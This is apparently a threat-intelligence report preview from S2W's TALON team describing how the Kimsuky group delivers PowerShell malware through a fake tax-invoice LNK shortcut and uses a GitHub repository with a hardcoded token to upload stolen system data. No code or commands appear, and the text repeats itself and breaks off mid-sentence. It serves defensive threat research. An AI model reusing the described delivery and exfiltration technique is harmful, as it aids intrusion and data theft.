Kimsuky’s Use of GitHub for Malware Delivery and Exfiltration
Contents
Kimsuky’s Use of GitHub for Malware Delivery and Exfiltration
2025.09.09
✅ Report Title: Kimsuky’s Use of GitHub for Malware Delivery and Exfiltration
✅ Executive Summary:
- S2W’s Threat Intelligence Center, TALON, has recently identified ongoing activity by the North Korea–backed APT group Kimsuky involving the abuse of GitHub repositories. A detailed analysis was conducted on the latest observed tactics.
- The threat actor leveraged a malicious LNK file to download and execute additional PowerShell-based scripts from a GitHub repository.
- To access the repository, the attacker embedded a hardcoded GitHub Private Token directly within the script.
- The PowerShell script retrieved from the repository collects system metadata including last boot time, system configuration, and running processes, writes the information into a log file, and uploads it to the attacker-controlled repository.
📌 Detailed Analysis
1) NTS_Attach.zip
- The ZIP archive contains an LNK file masquerading as an electronic tax invoice.
2) 전자세금계산서.pdf.lnk
- Executing the shortcut file disguised as a PDF launches a …
2025.09.09
✅ Report Title: Kimsuky’s Use of GitHub for Malware Delivery and Exfiltration
✅ Executive Summary:
- S2W’s Threat Intelligence Center, TALON, has recently identified ongoing activity by the North Korea–backed APT group Kimsuky involving the abuse of GitHub repositories. A detailed analysis was conducted on the latest observed tactics.
- The threat actor leveraged a malicious LNK file to download and execute additional PowerShell-based scripts from a GitHub repository.
- To access the repository, the attacker embedded a hardcoded GitHub Private Token directly within the script.
- The PowerShell script retrieved from the repository collects system metadata including last boot time, system configuration, and running processes, writes the information into a log file, and uploads it to the attacker-controlled repository.
📌 Detailed Analysis
1) NTS_Attach.zip
- The ZIP archive contains an LNK file masquerading as an electronic tax invoice.
2) 전자세금계산서.pdf.lnk
- Executing the shortcut file disguised as a PDF launches a …